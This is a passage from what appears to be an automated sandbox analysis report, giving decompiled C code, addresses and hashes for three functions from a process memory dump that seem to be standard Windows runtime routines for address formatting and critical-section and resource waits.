                                                                                                                                                              • Opcode Fuzzy Hash: dd0038cd4915145c2fac10d0072244fd84d8a925157a492593fe1f915872d077
                                                                                                                                                              • Instruction Fuzzy Hash: 1821A572900219ABCF21EE58CC41AEF73BCBB90700F444555FC46D3241DB749E598BE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009E3DA7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                              			E009E3DA7(void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v11;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				void* _t19;
				void* _t29;
				void* _t32;
				void* _t33;
				intOrPtr _t34;
				void* _t39;
				intOrPtr* _t40;
				void* _t42;
				signed int _t44;
				void* _t45;

				_t39 = __edx;
				_t17 =  *0xa22088; // 0x7741ce3b
				_v8 = _t17 ^ _t44;
				_t34 = _a16;
				_t41 = _a4;
				_t40 = _a20;
				if(_a4 == 0 || _t40 == 0 || _t34 == 0 &&  *_t40 != _t34) {
					L12:
					_t19 = 0xc000000d;
				} else {
					_t21 =  &_v76;
					if(_a12 != 0) {
						_push(0x949cbe);
						_push(0x41);
						_push( &_v76);
						_t33 = E009F894A();
						_t45 = _t45 + 0xc;
						_t21 = _t44 + _t33 - 0x48;
					}
					_t42 = E009E3B8E(_t41, _t21);
					if(_a8 != 0) {
						_t32 = E009F894A(_t42,  &_v11 - _t42, "%%%u", _a8);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t32;
					}
					if(_a12 != 0) {
						_t29 = E009F894A(_t42,  &_v11 - _t42, "]:%u", _a12 & 0x0000ffff);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t29;
					}
					_t41 = _t42 -  &_v76 + 1;
					 *_t40 = _t41;
					if( *_t40 < _t41) {
						goto L12;
					} else {
						E00942340(_t34,  &_v76, _t41);
						_t19 = 0;
					}
				}
				return E0094E1B4(_t19, _t34, _v8 ^ _t44, _t39, _t40, _t41);
			}




















                                                                                                                                                              0x009e3da7
                                                                                                                                                              0x009e3daf
                                                                                                                                                              0x009e3db6
                                                                                                                                                              0x009e3dba
                                                                                                                                                              0x009e3dbe
                                                                                                                                                              0x009e3dc2
                                                                                                                                                              0x009e3dc7
                                                                                                                                                              0x009e3e6b
                                                                                                                                                              0x009e3e6b
                                                                                                                                                              0x009e3de1
                                                                                                                                                              0x009e3de6
                                                                                                                                                              0x009e3de9
                                                                                                                                                              0x009e3deb
                                                                                                                                                              0x009e3df0
                                                                                                                                                              0x009e3df2
                                                                                                                                                              0x009e3df3
                                                                                                                                                              0x009e3df8
                                                                                                                                                              0x009e3dfb
                                                                                                                                                              0x009e3dfb
                                                                                                                                                              0x009e3e0a
                                                                                                                                                              0x009e3e0c
                                                                                                                                                              0x009e3e1d
                                                                                                                                                              0x009e3e22
                                                                                                                                                              0x009e3e25
                                                                                                                                                              0x009e3e25
                                                                                                                                                              0x009e3e2c
                                                                                                                                                              0x009e3e46
                                                                                                                                                              0x009e3e4b
                                                                                                                                                              0x009e3e4e
                                                                                                                                                              0x009e3e4e
                                                                                                                                                              0x009e3e55
                                                                                                                                                              0x009e3e58
                                                                                                                                                              0x009e3e5a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009e3e5c
                                                                                                                                                              0x009e3e5f
                                                                                                                                                              0x009e3e67
                                                                                                                                                              0x009e3e67
                                                                                                                                                              0x009e3e5a
                                                                                                                                                              0x009e3e7e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                                              • Opcode ID: a7dc9a781787d684c6e6cffd7f3034d11281abcd78a5ae48a4995c2787ab996c
                                                                                                                                                              • Instruction ID: 755f8454cb36ecc6e58d445e8d2cc7d537acb266cf7d3e29e04ad58ee1b55672
                                                                                                                                                              • Opcode Fuzzy Hash: a7dc9a781787d684c6e6cffd7f3034d11281abcd78a5ae48a4995c2787ab996c
                                                                                                                                                              • Instruction Fuzzy Hash: 4321CF7290021AABCB21AF6ADC49AFF77ACAF54714F148525FC0993141E7709E44C7E1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                              			E009653A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a201c0;
									_push(_t92);
									_push(0);
									_t37 = E0093F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00984FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00993F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00993F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E009C217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00993F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00983915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00965384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0093F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00983915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0093F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00983915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0093F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00983915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00965329(_t74, _t92);
													_push(1);
													_t48 = E009653A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                              0x009653ab
                                                                                                                                                              0x009653ae
                                                                                                                                                              0x009653b1
                                                                                                                                                              0x009653b4
                                                                                                                                                              0x009653b7
                                                                                                                                                              0x009805b6
                                                                                                                                                              0x009805c0
                                                                                                                                                              0x009805c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009805c9
                                                                                                                                                              0x009805c9
                                                                                                                                                              0x009805cc
                                                                                                                                                              0x009805d5
                                                                                                                                                              0x009805d5
                                                                                                                                                              0x009653bd
                                                                                                                                                              0x009653bd
                                                                                                                                                              0x009653bd
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2269
                                                                                                                                                              0x009a226d
                                                                                                                                                              0x009a2349
                                                                                                                                                              0x009a234d
                                                                                                                                                              0x009a2273
                                                                                                                                                              0x009a2276
                                                                                                                                                              0x009a2279
                                                                                                                                                              0x009a227e
                                                                                                                                                              0x009a2283
                                                                                                                                                              0x009a2287
                                                                                                                                                              0x009a228a
                                                                                                                                                              0x009a228d
                                                                                                                                                              0x009a228f
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22be
                                                                                                                                                              0x009a22c4
                                                                                                                                                              0x009a22cc
                                                                                                                                                              0x009a22d0
                                                                                                                                                              0x009a22d6
                                                                                                                                                              0x009a22d7
                                                                                                                                                              0x009a22da
                                                                                                                                                              0x009a22df
                                                                                                                                                              0x009a22e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22e6
                                                                                                                                                              0x009a22e9
                                                                                                                                                              0x009a22f4
                                                                                                                                                              0x009a22f9
                                                                                                                                                              0x009a22fa
                                                                                                                                                              0x009a2305
                                                                                                                                                              0x009a2314
                                                                                                                                                              0x009a2319
                                                                                                                                                              0x009a231a
                                                                                                                                                              0x009a231d
                                                                                                                                                              0x009a2320
                                                                                                                                                              0x009a2323
                                                                                                                                                              0x009a2323
                                                                                                                                                              0x009a2328
                                                                                                                                                              0x009a232d
                                                                                                                                                              0x009a232f
                                                                                                                                                              0x009a2331
                                                                                                                                                              0x009a2336
                                                                                                                                                              0x009a2336
                                                                                                                                                              0x009a233b
                                                                                                                                                              0x009a233d
                                                                                                                                                              0x009a2350
                                                                                                                                                              0x009a2351
                                                                                                                                                              0x009a2356
                                                                                                                                                              0x009a2359
                                                                                                                                                              0x009a2359
                                                                                                                                                              0x009a235b
                                                                                                                                                              0x009a235d
                                                                                                                                                              0x00965367
                                                                                                                                                              0x0096536b
                                                                                                                                                              0x00965372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2363
                                                                                                                                                              0x009a2363
                                                                                                                                                              0x009a2369
                                                                                                                                                              0x009a236a
                                                                                                                                                              0x009a236c
                                                                                                                                                              0x009a2371
                                                                                                                                                              0x009a2373
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2379
                                                                                                                                                              0x009a2379
                                                                                                                                                              0x009a237a
                                                                                                                                                              0x009a237f
                                                                                                                                                              0x009a237f
                                                                                                                                                              0x009a2385
                                                                                                                                                              0x009a2386
                                                                                                                                                              0x009a2389
                                                                                                                                                              0x009a238e
                                                                                                                                                              0x009a2390
                                                                                                                                                              0x00965378
                                                                                                                                                              0x0096537c
                                                                                                                                                              0x009a2396
                                                                                                                                                              0x009a2396
                                                                                                                                                              0x009a2397
                                                                                                                                                              0x009a239c
                                                                                                                                                              0x009a23a2
                                                                                                                                                              0x009a23a3
                                                                                                                                                              0x009a23a6
                                                                                                                                                              0x009a23ab
                                                                                                                                                              0x009a23ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a23b3
                                                                                                                                                              0x009a23b3
                                                                                                                                                              0x009a23b4
                                                                                                                                                              0x009a23b9
                                                                                                                                                              0x009a23ba
                                                                                                                                                              0x009a23ba
                                                                                                                                                              0x009a23bc
                                                                                                                                                              0x009a23bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999153
                                                                                                                                                              0x00999158
                                                                                                                                                              0x0099915a
                                                                                                                                                              0x0099915e
                                                                                                                                                              0x00999160
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999166
                                                                                                                                                              0x00999166
                                                                                                                                                              0x00999171
                                                                                                                                                              0x00999176
                                                                                                                                                              0x00999176
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999160
                                                                                                                                                              0x009a23c6
                                                                                                                                                              0x009a23cb
                                                                                                                                                              0x009a23ce
                                                                                                                                                              0x009a23d7
                                                                                                                                                              0x009a23d7
                                                                                                                                                              0x009a23ad
                                                                                                                                                              0x009a2390
                                                                                                                                                              0x009a2373
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x009a2291
                                                                                                                                                              0x009a2291
                                                                                                                                                              0x009a2293
                                                                                                                                                              0x009a2295
                                                                                                                                                              0x009a229a
                                                                                                                                                              0x009a22a1
                                                                                                                                                              0x009a22a3
                                                                                                                                                              0x009a22a7
                                                                                                                                                              0x009a22a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22ab
                                                                                                                                                              0x009a22ad
                                                                                                                                                              0x009a22af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22af
                                                                                                                                                              0x009a22b1
                                                                                                                                                              0x009a22b4
                                                                                                                                                              0x009a22b4
                                                                                                                                                              0x009a22b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22b6
                                                                                                                                                              0x009a228f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a226d
                                                                                                                                                              0x009653cb
                                                                                                                                                              0x009653ce
                                                                                                                                                              0x009653d0
                                                                                                                                                              0x009653d4
                                                                                                                                                              0x009653d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009653d8
                                                                                                                                                              0x009653e3
                                                                                                                                                              0x009653ea
                                                                                                                                                              0x009653ea
                                                                                                                                                              0x009653d6
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A22F4
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Resource at %p, xrefs: 009A230B
                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009A22FC
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 009A2328
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-871070163
                                                                                                                                                              • Opcode ID: dbb76d5c421f4c9d782efe9d07173ad43d00532effa8061311d3f236f258ac01
                                                                                                                                                              • Instruction ID: cb8e71f178527d762a04775780cb9503f2fa991afaf815ce1171e9ce1f17a6b7
                                                                                                                                                              • Opcode Fuzzy Hash: dbb76d5c421f4c9d782efe9d07173ad43d00532effa8061311d3f236f258ac01
                                                                                                                                                              • Instruction Fuzzy Hash: 2E51F771600702ABDF15EF28CC81FA6739CAF95B64F114229FD14DB381EA65ED418BE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0096EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E0096EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0095DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xa2793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E009416C0(_t39);
				} else {
					_t40 = E0093F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00983915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E009401A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xa2793c; // 0x0
								_push(_t85);
								_t44 = E00941F28(_t71);
							} else {
								_t44 = E0093F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00983915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E009C2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0096EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00984FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00993F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00993F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xa220c0;
								if(_t85 != 0xa220c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E009C217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00993F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                              0x0096ec56
                                                                                                                                                              0x0096ec56
                                                                                                                                                              0x0096ec56
                                                                                                                                                              0x0096ec5c
                                                                                                                                                              0x0096ec64
                                                                                                                                                              0x009a23e6
                                                                                                                                                              0x009a23eb
                                                                                                                                                              0x009a23eb
                                                                                                                                                              0x0096ec6a
                                                                                                                                                              0x0096ec6c
                                                                                                                                                              0x0096ec6f
                                                                                                                                                              0x009a23f3
                                                                                                                                                              0x009a23f8
                                                                                                                                                              0x009a23fa
                                                                                                                                                              0x009a23fc
                                                                                                                                                              0x0096ec75
                                                                                                                                                              0x0096ec76
                                                                                                                                                              0x0096ec76
                                                                                                                                                              0x0096ec7b
                                                                                                                                                              0x0096ec7c
                                                                                                                                                              0x0096ec7e
                                                                                                                                                              0x009a2406
                                                                                                                                                              0x009a2407
                                                                                                                                                              0x009a240c
                                                                                                                                                              0x009a240d
                                                                                                                                                              0x009a240d
                                                                                                                                                              0x009a240d
                                                                                                                                                              0x009a2414
                                                                                                                                                              0x009a2417
                                                                                                                                                              0x009a241e
                                                                                                                                                              0x009a2435
                                                                                                                                                              0x009a2438
                                                                                                                                                              0x009a243c
                                                                                                                                                              0x009a243f
                                                                                                                                                              0x009a2442
                                                                                                                                                              0x009a2443
                                                                                                                                                              0x009a2446
                                                                                                                                                              0x009a2449
                                                                                                                                                              0x009a2453
                                                                                                                                                              0x009a2455
                                                                                                                                                              0x009a245b
                                                                                                                                                              0x009a245b
                                                                                                                                                              0x0096eb99
                                                                                                                                                              0x0096eb99
                                                                                                                                                              0x0096eb9c
                                                                                                                                                              0x0096eb9d
                                                                                                                                                              0x0096eb9f
                                                                                                                                                              0x0096eba2
                                                                                                                                                              0x009a2465
                                                                                                                                                              0x009a246b
                                                                                                                                                              0x009a246d
                                                                                                                                                              0x0096eba8
                                                                                                                                                              0x0096eba9
                                                                                                                                                              0x0096eba9
                                                                                                                                                              0x0096ebae
                                                                                                                                                              0x0096ebb3
                                                                                                                                                              0x0096ebb9
                                                                                                                                                              0x0096ebbb
                                                                                                                                                              0x009a2513
                                                                                                                                                              0x009a2514
                                                                                                                                                              0x009a2519
                                                                                                                                                              0x009a251b
                                                                                                                                                              0x0096ec2a
                                                                                                                                                              0x0096ec2d
                                                                                                                                                              0x0096ec33
                                                                                                                                                              0x0096ec36
                                                                                                                                                              0x0096ec3a
                                                                                                                                                              0x0096ec3e
                                                                                                                                                              0x0096ec40
                                                                                                                                                              0x0096ec47
                                                                                                                                                              0x0096ec47
                                                                                                                                                              0x0096ec40
                                                                                                                                                              0x009422c6
                                                                                                                                                              0x0096ebc1
                                                                                                                                                              0x0096ebc1
                                                                                                                                                              0x0096ebc5
                                                                                                                                                              0x0096ec9a
                                                                                                                                                              0x0096ec9a
                                                                                                                                                              0x0096ebd6
                                                                                                                                                              0x0096ebd6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096ebbb
                                                                                                                                                              0x009a2477
                                                                                                                                                              0x009a247c
                                                                                                                                                              0x009a2486
                                                                                                                                                              0x009a248b
                                                                                                                                                              0x009a2496
                                                                                                                                                              0x009a249b
                                                                                                                                                              0x009a249d
                                                                                                                                                              0x009a24a0
                                                                                                                                                              0x009a24a3
                                                                                                                                                              0x009a24aa
                                                                                                                                                              0x009a24aa
                                                                                                                                                              0x009a24a5
                                                                                                                                                              0x009a24a5
                                                                                                                                                              0x009a24a5
                                                                                                                                                              0x009a24ac
                                                                                                                                                              0x009a24af
                                                                                                                                                              0x009a24b0
                                                                                                                                                              0x009a24b3
                                                                                                                                                              0x009a24b9
                                                                                                                                                              0x009a24ba
                                                                                                                                                              0x009a24bb
                                                                                                                                                              0x009a24c6
                                                                                                                                                              0x009a24cb
                                                                                                                                                              0x009a24cd
                                                                                                                                                              0x009a24d0
                                                                                                                                                              0x009a24d1
                                                                                                                                                              0x009a24d4
                                                                                                                                                              0x009a24d6
                                                                                                                                                              0x009a24d9
                                                                                                                                                              0x009a24d9
                                                                                                                                                              0x009a24dc
                                                                                                                                                              0x009a24df
                                                                                                                                                              0x009a24e1
                                                                                                                                                              0x009a24e7
                                                                                                                                                              0x009a24e9
                                                                                                                                                              0x009a24ec
                                                                                                                                                              0x009a24ef
                                                                                                                                                              0x009a24f2
                                                                                                                                                              0x009a24f2
                                                                                                                                                              0x009a24ef
                                                                                                                                                              0x009a24e7
                                                                                                                                                              0x009a24fa
                                                                                                                                                              0x009a24ff
                                                                                                                                                              0x009a2501
                                                                                                                                                              0x009a2503
                                                                                                                                                              0x009a2506
                                                                                                                                                              0x009a250b
                                                                                                                                                              0x0096eb8c
                                                                                                                                                              0x0096eb93
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096eb93
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096eb99
                                                                                                                                                              0x0096ec85
                                                                                                                                                              0x0096ec85
                                                                                                                                                              0x0096ec85
